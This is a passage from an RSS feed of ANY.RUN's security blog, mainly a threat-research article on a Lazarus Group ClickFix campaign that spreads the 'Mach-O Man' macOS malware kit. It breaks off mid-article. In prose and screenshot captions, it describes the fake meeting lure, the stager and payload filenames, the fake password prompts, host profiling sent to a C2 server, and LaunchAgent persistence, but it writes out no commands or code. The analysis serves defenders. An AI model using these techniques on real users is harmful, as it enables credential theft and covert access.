class="schema-faq-section" id="faq-question-1776863225833"><strong class="schema-faq-question">How does AI search help analysts?</strong> <p class="schema-faq-answer">It simplifies query building by translating intent into structured search parameters, reducing time spent on syntax and accelerating investigations.</p> </div> <div class="schema-faq-section" id="faq-question-1776863232650"><strong class="schema-faq-question">Can this be integrated into existing security infrastructure?</strong> <p class="schema-faq-answer">Yes, paid plans support integration with SIEM, SOAR, and other security systems, enabling automated workflows and enrichment.</p> </div> <div class="schema-faq-section" id="faq-question-1776863250785"><strong class="schema-faq-question">Who is this most relevant for?</strong> <p class="schema-faq-answer">SOC teams, MSSPs, and security leaders who want to improve decision speed, reduce uncertainty, and lower incident response costs.</p> </div> </div>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/expanded-free-ti-plan/">More Attack Context for Faster Triage, Response, and Hunting. Now Available to Every SOC</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/expanded-free-ti-plan/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>New Lazarus APT Campaign: “Mach-O Man” macOS Malware Kit Hits Businesses</title>
		<link>https://any.run/cybersecurity-blog/lazarus-macos-malware-mach-o-man/</link>
					<comments>https://any.run/cybersecurity-blog/lazarus-macos-malware-mach-o-man/#respond</comments>
		
		<dc:creator><![CDATA[Mauro Eldritch]]></dc:creator>
		<pubDate>Tue, 21 Apr 2026 08:49:42 +0000</pubDate>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[malware analysis]]></category>
		<category><![CDATA[malware behavior]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=20176</guid>

					<description><![CDATA[<p>Editor’s note:&#160;The research is authored by Mauro Eldritch, offensive security expert and a founder of BCA LTD, a company dedicated to threat intelligence and hunting. You can&#160;find Mauro on X.&#160; The recent wave of&#160;ClickFix attacks&#160;has introduced several new ways to compromise users,&#160;establishing&#160;itself as a technique that is likely here to stay. We have&#160;observed&#160;Lazarus Group using [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/lazarus-macos-malware-mach-o-man/">New Lazarus APT Campaign: “Mach-O Man” macOS Malware Kit Hits Businesses</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p><em><strong>Editor’s note:</strong></em><strong><em>&nbsp;The research is authored by Mauro Eldritch, offensive security expert and a founder of BCA LTD, a company dedicated to threat intelligence and hunting. You can&nbsp;</em><a href="https://x.com/MauroEldritch" target="_blank" rel="noreferrer noopener"><em>find Mauro on X</em></a><em>.</em>&nbsp;</strong></p>



<p>The recent wave of&nbsp;<a href="https://any.run/cybersecurity-blog/click-fix-attacks-eric-parker-analysis/" target="_blank" rel="noreferrer noopener">ClickFix attacks</a>&nbsp;has introduced several new ways to compromise users,&nbsp;establishing&nbsp;itself as a technique that is likely here to stay. We have&nbsp;observed&nbsp;Lazarus Group using this method to distribute a range of malware, from well-known families to more unusual variants such as&nbsp;<a href="https://any.run/cybersecurity-blog/lazarus-group-it-workers-investigation/" target="_blank" rel="noreferrer noopener">PyLangGhostRAT</a>, a Python-based vibe-ported of the original Go version, along with other oddities.&nbsp;</p>



<p>In this article, we analyze the next stage of this campaign: a newly identified macOS malware kit that is currently being actively distributed.&nbsp;</p>



<h2 class="wp-block-heading">Executive Summary</h2>



<ul class="wp-block-list">
<li><strong>What’s&nbsp;happening:</strong>&nbsp;<a href="https://any.run/cybersecurity-blog/enterprise-cybersecurity-risks-2026/" target="_blank" rel="noreferrer noopener">Lazarus Group</a> is running an active campaign using fake meetings to gain access to corporate systems, credentials, and sensitive data.&nbsp;</li>



<li><strong>Who is at risk:</strong>&nbsp;Fintech, crypto, and high-value environments where <a href="https://any.run/cybersecurity-blog/anyrun-macos-sandbox/" target="_blank" rel="noreferrer noopener">macOS</a> is widely used by developers, executives, and decision-makers.&nbsp;</li>



<li><strong>How access is gained:</strong>&nbsp;Users execute commands themselves, allowing attackers to bypass traditional controls and&nbsp;operate&nbsp;without immediate detection.&nbsp;</li>



<li><strong>What attackers are after:</strong>&nbsp;Credentials, browser sessions, and macOS Keychain data that provide direct access to infrastructure and financial assets.&nbsp;</li>



<li><strong>Why this is hard to detect:</strong>&nbsp;The attack relies on social engineering and native macOS binaries, reducing visibility for traditional EDR tools.&nbsp;</li>



<li><strong>How data is exfiltrated:</strong>&nbsp;Telegram is used as a trusted channel to move sensitive data outside the organization.&nbsp;</li>



<li><strong>What this leads to:</strong>&nbsp;Account takeover, unauthorized infrastructure access,&nbsp;financial loss, and exposure of critical data.&nbsp;</li>



<li><strong>What this means for CISOs:</strong>&nbsp;A single compromised macOS device can result in full access to internal systems, production environments, or crypto assets.&nbsp;</li>



<li><strong>How SOCs should respond:</strong> Identify credential exposure early by introducing <a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN’s cross-platform analysis capabilities</a> during triage that offers a 36% higher detection rate.</li>
</ul>



<h2 class="wp-block-heading">New&nbsp;Lazarus&nbsp;ClickFix&nbsp;macOS&nbsp;Campaign:&nbsp;Why Companies Are at Risk&nbsp;</h2>



<p>Lazarus Group is actively&nbsp;<a href="https://quetzal.bitso.com/p/north-koreas-safari-hunting-for-rats?triedRedirect=true" target="_blank" rel="noreferrer noopener">running a campaign</a>&nbsp;that turns routine business communication into a direct path to credential theft and data loss.&nbsp;</p>



<p>The attack targets&nbsp;business leaders&nbsp;through Telegram, often using compromised accounts of colleagues or contacts. Victims receive what&nbsp;appears to be&nbsp;a legitimate meeting invitation and are redirected to a fake collaboration platform that mimics Zoom, Microsoft Teams, or&nbsp;<a href="https://any.run/cybersecurity-blog/enterprise-phishing-analysis/" target="_blank" rel="noreferrer noopener">Google</a>&nbsp;Meet. The scenario is familiar and urgent, which lowers suspicion and increases the likelihood of interaction.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="589" height="861" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/077fa2ef-0fbe-485a-b6b5-a7a2ae71d628_589x861.jpg" alt="" class="wp-image-20179" style="width:417px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/077fa2ef-0fbe-485a-b6b5-a7a2ae71d628_589x861.jpg 589w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/077fa2ef-0fbe-485a-b6b5-a7a2ae71d628_589x861-205x300.jpg 205w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/077fa2ef-0fbe-485a-b6b5-a7a2ae71d628_589x861-370x541.jpg 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/077fa2ef-0fbe-485a-b6b5-a7a2ae71d628_589x861-270x395.jpg 270w" sizes="(max-width: 589px) 100vw, 589px" /><figcaption class="wp-element-caption"><em>Messages sent by Lazarus operatives. Credit:&nbsp;Bitso&nbsp;Quetzal Team</em>&nbsp;<br></figcaption></figure></div>


<p>Instead of exploiting a technical vulnerability, the attackers rely on&nbsp;a simple instruction. The user is prompted to “fix” a connection issue by copying and executing a command. This step shifts control to the attacker without triggering many traditional security&nbsp;controls, because&nbsp;the action is performed by the user themselves.&nbsp;</p>



<p>From that moment, the operation is focused on extracting business value as quickly as possible. The attacker collects credentials, browser sessions, and system-stored secrets, including macOS Keychain data. These assets provide immediate access to corporate systems, SaaS platforms, and financial resources.&nbsp;</p>



<p>Telegram is used again as an exfiltration channel, allowing stolen data to be transferred through a legitimate service that blends into normal traffic.&nbsp;&nbsp;</p>



<p>By the time the activity is recognized as malicious, credentials may already be&nbsp;compromised&nbsp;and sensitive data already exfiltrated. At that point, the organization is dealing with:&nbsp;</p>



<ul class="wp-block-list">
<li>Unauthorized access to business systems and accounts&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Financial loss&nbsp;through fraudulent transactions or misuse of access&nbsp;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Exposure of sensitive data leading to regulatory and reputational impact&nbsp;</li>
</ul>



<p>At the core of this operation is a newly identified macOS malware kit, “Mach-O Man”,&nbsp;discovered by the Quetzal Team. Built as a set of Go-based Mach-O binaries, it reflects a shift toward native macOS threats. The following sections break down how this kit&nbsp;operates&nbsp;across each stage of the attack chain.&nbsp;</p>



<h2 class="wp-block-heading">Technical Analysis of the Mach-O Man Kit&nbsp;</h2>



<h2 class="wp-block-heading">The Stager&nbsp;</h2>



<p>As described earlier,&nbsp;in&nbsp;this&nbsp;ClickFix&nbsp;campaign, the victim is invited to a meeting via Telegram, typically by a compromised contact sharing a&nbsp;link.&nbsp;&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="527" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image2-3-1024x527.png" alt="" class="wp-image-20182" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image2-3-1024x527.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image2-3-300x154.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image2-3-768x395.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image2-3-1536x790.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image2-3-2048x1054.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image2-3-370x190.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image2-3-270x139.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image2-3-585x300.png 585w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image2-3-740x381.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The full malware kit with all its components and variants</em></figcaption></figure></div>


<p>When the user visits it, they are taken to a site impersonating a legitimate meeting platform such as Zoom, Meet, or Teams. The page then displays a fake error message claiming that, to resolve the issue, the user must copy and paste a command into their terminal.&nbsp;</p>



<p>Thanks to&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">ANY.RUN’s Interactive Sandbox</a>,&nbsp;we&nbsp;can safely&nbsp;execute this command and&nbsp;observe&nbsp;the malicious behavior inside a&nbsp;secure macOS VM,&nbsp;without risk to our systems.&nbsp;&nbsp;</p>



<p><a href="https://app.any.run/tasks/937afde2-5e3c-4eb0-a7d1-6124f0f3ed18/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">See live sandbox analysis of fake Mach-O Man kit apps</a>&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="641" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/frame_generic_light-2-1-1024x641.png" alt="" class="wp-image-20262" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/frame_generic_light-2-1-1024x641.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/frame_generic_light-2-1-300x188.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/frame_generic_light-2-1-768x480.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/frame_generic_light-2-1-1536x961.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/frame_generic_light-2-1-370x231.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/frame_generic_light-2-1-270x169.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/frame_generic_light-2-1-740x463.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/frame_generic_light-2-1.png 1944w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Fake&nbsp;Mach-O Man Kit apps shown inside ANY.RUN’s sandbox</em></figcaption></figure></div>


<p>Trusted by <a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktoenterprise" target="_blank" rel="noreferrer noopener">15,000 organizations worldwide</a>, including 74 Fortune 100 companies, ANY.RUN accelerates triage &amp; response by enabling SOC teams to analyze URLs and files within a&nbsp;private, real-time virtual&nbsp;environment, reproducing the full attack flow across Windows, macOS, Linux, and Android.&nbsp;&nbsp;</p>



<p>The result is faster, more&nbsp;consistent&nbsp;decisions across the SOC, with earlier identification of threats, reduced response time, and lower risk of incidents escalating into financial and operational impact.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Close blind spots and reduce breach risks in your company. </span><br>Integrate ANY.RUN’s sandbox for early threat detection.&nbsp;   
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/features/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=lazarus-apt-macos-campaign&#038;utm_term=210426&#038;utm_content=linktosandboxlanding#contact-sales" rel="noopener" target="_blank">
Contact us
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p>Pasting and running the command in the terminal leads to&nbsp;the installation of malware. In this case, it executes&nbsp;teamsSDK.bin, the stager and initial&nbsp;component&nbsp;of the Mach-O Man kit.&nbsp;</p>



<p>When executed in our laboratory, we&nbsp;observed&nbsp;an interesting behavior: when run without arguments, the binary displays a usage message&nbsp;indicating&nbsp;how to activate it and revealing support for impersonating Google, Zoom, Teams, and “System”.&nbsp;</p>



<p>Fun fact: if you try to choose Google, it politely&nbsp;states&nbsp;that it is “not yet implemented”.&nbsp;A surprisingly polished touch.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="706" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-2-1024x706.png" alt="" class="wp-image-20187" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-2-1024x706.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-2-300x207.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-2-768x530.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-2-1536x1059.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-2-2048x1412.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-2-370x255.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-2-270x186.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-2-435x300.png 435w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-2-740x510.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Stager&nbsp;teamsSDK.bin&nbsp;usage</em></figcaption></figure></div>


<p>When invoked correctly, it downloads a fake macOS Application impersonating one of the previously mentioned platforms, with “System” referring to generic macOS system prompts presented to the user. To ensure execution, the malware uses macOS’ codesign utility to apply an ad-hoc signature to the application bundle, making it appear properly signed to the system.&nbsp;</p>



<p>All applications are&nbsp;virtually identical, differing only in minimal visual cues. They prompt the user for their password in broken English three times in a row.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="706" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image5-1-1024x706.png" alt="" class="wp-image-20190" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image5-1-1024x706.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image5-1-300x207.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image5-1-768x530.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image5-1-1536x1059.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image5-1-2048x1412.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image5-1-370x255.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image5-1-270x186.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image5-1-435x300.png 435w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image5-1-740x510.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Fake Teams App prompts for user credentials</em>&nbsp;</figcaption></figure></div>


<p>The first two attempts always shake the window,&nbsp;indicating&nbsp;that the password is incorrect (even if not), while the third one disappears as if the authentication had succeeded.&nbsp;</p>



<p>Independently, at the end they all display Zoom’s logo along with a message&nbsp;stating&nbsp;that the installation was successful.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="612" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image6-1-1024x612.png" alt="" class="wp-image-20192" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image6-1-1024x612.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image6-1-300x179.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image6-1-768x459.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image6-1-1536x918.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image6-1-2048x1224.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image6-1-370x221.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image6-1-270x161.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image6-1-740x442.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Zoom logo displayed on the fake Teams App&nbsp;</figcaption></figure></div>


<p>Running them interactively from the shell reveals errors during execution. Many interesting failures will be discussed throughout the analysis of the remaining components, suggesting that exhaustive testing was not conducted.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="604" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/E-1-1024x604.png" alt="" class="wp-image-20207" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/E-1-1024x604.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/E-1-300x177.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/E-1-768x453.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/E-1-1536x906.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/E-1-2048x1207.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/E-1-370x218.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/E-1-270x159.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/E-1-740x436.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Most modules present faulty functions or unexpected errors</em></figcaption></figure></div>


<p>In the background, the next stage is downloaded, typically named in the format D1{??????}.bin. Some examples we were able to retrieve include D1YrHRTg.bin, D1yCPUyk.bin, and D1ozPVNG.bin. At the same time, the malware performs basic fingerprinting via&nbsp;sysctl&nbsp;queries, collecting information such as CPU details and system boot time.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="576" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/F-1024x576.png" alt="" class="wp-image-20210" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/F-1024x576.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/F-300x169.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/F-768x432.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/F-1536x865.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/F-2048x1153.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/F-370x208.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/F-270x152.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/F-740x417.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Basic host fingerprinting</em>&nbsp;</figcaption></figure></div>


<p>Let’s&nbsp;check the next stage.&nbsp;</p>



<h2 class="wp-block-heading">The Profiler&nbsp;</h2>



<p>This second binary, D1YrHRTg.bin (or any other variant you are able to retrieve), acts as a system profiler.&nbsp;It registers the host with the C2 and sends a system profile.&nbsp;</p>



<p>The first notable behavior is that, when executed without arguments, it once again displays a usage message, a&nbsp;rather kind&nbsp;gesture.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="706" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image9-2-1024x706.png" alt="" class="wp-image-20195" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image9-2-1024x706.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image9-2-300x207.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image9-2-768x530.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image9-2-1536x1059.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image9-2-2048x1412.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image9-2-370x255.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image9-2-270x186.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image9-2-435x300.png 435w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image9-2-740x510.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Most modules&nbsp;contain&nbsp;a usage message</em></figcaption></figure></div>


<p>This module relies on&nbsp;sysctl&nbsp;and local userland tools to build a comprehensive profile of the host, including hostname, a unique identifier, CPU type, boot time, operating system details, network configuration, running processes, and a list of browser extensions, with dedicated targeting of Brave, Vivaldi, Opera, Chrome, Firefox, and Safari.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Speed up triage &#038; response workflows in your SOC. </span><br>Validate alerts and analyze artifacts with ANY.RUN.&nbsp;   
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="http://app.any.run/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=lazarus-apt-macos-campaign&#038;utm_term=210426&#038;utm_content=linktoregistration#register/" rel="noopener" target="_blank">
Sign up
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p>This information is written to a text file and sent to the C2 server.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="702" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/H-1-1024x702.png" alt="" class="wp-image-20253" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/H-1-1024x702.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/H-1-300x206.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/H-1-768x527.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/H-1-1536x1054.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/H-1-2048x1405.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/H-1-370x254.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/H-1-270x185.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/H-1-740x508.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The TXT file broadcasted to the C2 Server</em></figcaption></figure></div>


<p>As previously noted, some of these modules are faulty.&nbsp;&nbsp;</p>



<p>This one, in particular, exhibits&nbsp;a self-sabotaging behavior, occasionally entering an endless loop that repeatedly posts the system profile text file to the C2 server, exhausting system resources and making its presence&nbsp;quite obvious&nbsp;to the victim.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="653" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/I-1-1024x653.png" alt="" class="wp-image-20216" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/I-1-1024x653.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/I-1-300x191.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/I-1-768x489.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/I-1-1536x979.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/I-1-2048x1305.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/I-1-370x236.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/I-1-270x172.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/I-1-740x472.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Repeated curl commands posting the same file</em>&nbsp;</figcaption></figure></div>


<p>Next, a new binary called minst2.bin is retrieved from the /payload C2 endpoint, marking the beginning of the persistence stage.&nbsp;</p>



<h2 class="wp-block-heading">The Persistence Mechanism&nbsp;</h2>



<p>minst2.bin was slightly trickier to debug, as it does not come bundled with a usage helper, so I had to manually fine-tune both the number and type of arguments&nbsp;required. After reverse engineering how the previous stage invokes it, I found that it takes the machine UUID, a payload URL, and a filename as arguments, and proceeds to download a remote file named&nbsp;localencode, saving it locally as OneDrive and setting it up to run at as a startup item.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="604" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/J-1-1024x604.png" alt="" class="wp-image-20219" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/J-1-1024x604.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/J-1-300x177.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/J-1-768x453.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/J-1-1536x906.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/J-1-2048x1207.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/J-1-370x218.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/J-1-270x159.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/J-1-740x436.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>A Bash service is created for persistence</em>&nbsp;</figcaption></figure></div>


<p>To achieve this, it creates a folder called “Antivirus Service”,&nbsp;where it stores this binary, and sets up a&nbsp;LaunchAgent, the macOS equivalent of a Windows Service, to execute it at startup. From that point on, it re-invokes the malware kit at every login.&nbsp;</p>


<div class="wp-block-image">
